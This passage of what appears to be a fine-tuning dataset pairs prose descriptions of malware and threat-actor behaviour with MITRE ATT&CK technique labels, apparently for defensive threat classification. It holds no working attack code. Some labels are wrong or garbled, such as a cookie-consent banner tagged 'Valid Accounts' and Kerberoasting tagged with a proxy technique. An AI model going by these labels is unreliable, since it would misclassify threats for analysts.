- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If after the package has been decoded its size is bigger than 3 bytes, the Trojan decrypts its first 11 bytes with XOR using the method similar to the one described above"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the past, this APT has relied on Hangul Office documents (hwp files) to target victims, as it’s software that’s commonly used in South Korea. However, in this blog we describe an interesting alternative method, delivered via self-decoding VBA Office files"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Currently, Agent Tesla continues to be utilized in various stages of attacks. Agent Tesla is now able to harvest configuration data and credentials from a number of common VPN clients, FTP and Email clients, and Web Browsers. The malware has the ability to extract credentials from the registry as well as related configuration or support files. Our analysis of a swatch of current Agent Tesla samples reveals the following list of targeted software"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry', 'T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to identify the OS version, OS bit information and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to list the victim's processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuietSieve can search files on the target host by extension, including doc, docx, xls, rtf, odt, txt, jpg, pdf, rar, zip, and 7z."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels"
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 aggregates staged data from a network into a single location."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TINYTYPHON searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can collect CPU and architecture information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can use cmd.exe for command execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can obtain passwords from FTP clients."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to upload to its C2 server victim browser bookmarks."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and for data exfiltration"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has searched the Image File Execution Options registry key for \"Debugger\" within every subkey."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volexity reported yesterday that its analysts had identified approximately 1,600 ZCS servers that they believe were compromised by threat actors leveraging CVE-2022-41352 to plant webshells"
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt has probed victim machines with \"whoami\" and has collected the username from the machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. The group has used domains on other TLDs, though rather sparingly. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to download files from a given URL."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "payloads download additional files from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23"
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak also collects information on accounts, files and directories, group permissions, and registries."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim."
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can gather the OS version, architecture information, connected drives, hostname, RAM size, and disk space information from the victim’s machine and has used \"cmd /c systeminfo\" command to get a snapshot of the current system state of the target machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command_Down_exec: This command downloads and executes new modules. It takes a url as the argument and uses that to download and execute files"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tracing the origin of the hidden .mina file showed that it is a copy of an included resource, renamed SubMenu.nib, from the application bundle and where the main backdoor functions were contained. It also has the same links to Lazarus’ Windows and Linux predecessors: the presence of the hardcoded strings c_2910.cls and k_3872.cls. Both strings were previously used during C&C communication to the domain thevagabondsatchel[.]com as the sample storage of the cybercriminal group, as reported by 360 Netlab researchers"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex has encrypted traffic with RSA."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon has used call to \"LoadLibrary\" to load its installer. PipeMon loads its modules using reflective loading or custom shellcode."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses Rundll32 to load and execute malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has queried the AWS instance metadata service for credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prikormka adds itself to a Registry Run key with the name guidVGA or guidVSA."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can use WMI queries to retrieve data from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa decrypts a downloaded file using AES-128-EBC with a custom delta."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire includes various modules for enumerating Group Policy."
- },
- {
- "role": "assistant",
- "content": "T1615 - Group Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can use `rundll32.exe` for execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors used packers that read pixel data from images contained in PE files' resource sections and build the next layer of execution from the data."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has used PowerShell commands embedded inside batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "extracts and decrypts stage 3 malware, which is stored in encrypted resources."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used shellcode to download Meterpreter after compromising a victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT contains watchdog functionality that ensures its process is always running, else spawns a new instance."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CVE-2022-42821 allows hackers to bypass Gatekeeper by setting restrictive Access Control Lists (ACLs) using specially-crafted payloads that prohibit Safari, web downloaders or any other program through which an app is downloaded from setting com.apple.quarantine attribute to the downloaded file/application/software."
- },
- {
- "role": "assistant",
- "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like the ChinaChopper web shell, the OwaAuth web shell requires a password"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of probing the network for open ports."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Vetala used spearphishing emails with embedded links to a legitimate file-sharing service to distribute their malicious package"
- },
- {
- "role": "assistant",
- "content": "T1583.006 - Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 messages are Base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses the LoadLibraryExW() function to load additional modules."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails."
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also deletes Windows Event Logs : Application, Security, Setup, System. It is less focused on deleting documents"
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BONDUPDATER persists using a scheduled task that executes every minute."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot communicated with its C2 server via HTTP GET requests."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim."
- },
- {
- "role": "assistant",
- "content": "T1092 - Communication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Russian state-sponsored APT actors have performed “Kerberoasting,” whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy', 'T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The component KillDisk is capable of deleting Windows Event Logs."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe uses custom Base64 encoding schemes to obfuscate command and control traffic in the message body of HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script is executed by the scheduled task used to maintain persistence, with its main goal being"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pass Logger -> a credential stealer, used for stealing credentials stored in the Chrome, Firefox and Opera browsers"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth web shell PDB string"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger has the ability to inject shellcode into svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installer searches the Registry and system to see if specific antivirus tools are installed on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN collects the OS name, machine name, and architecture information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After execution of every task, the malware sleeps for one minute before executing the next task"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest [x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. Expiry: SessionType: HTTPMarketo2Learn more about this provider__cf_bmThis cookie is used to distinguish between humans and bots. Expiry: 2 yearsType: HTTP25 Marketing cookies are used to track visitors across websites. This can be used for marketing purposes. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can exploit vulnerabilities such as MS16-032 and MS16-135."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
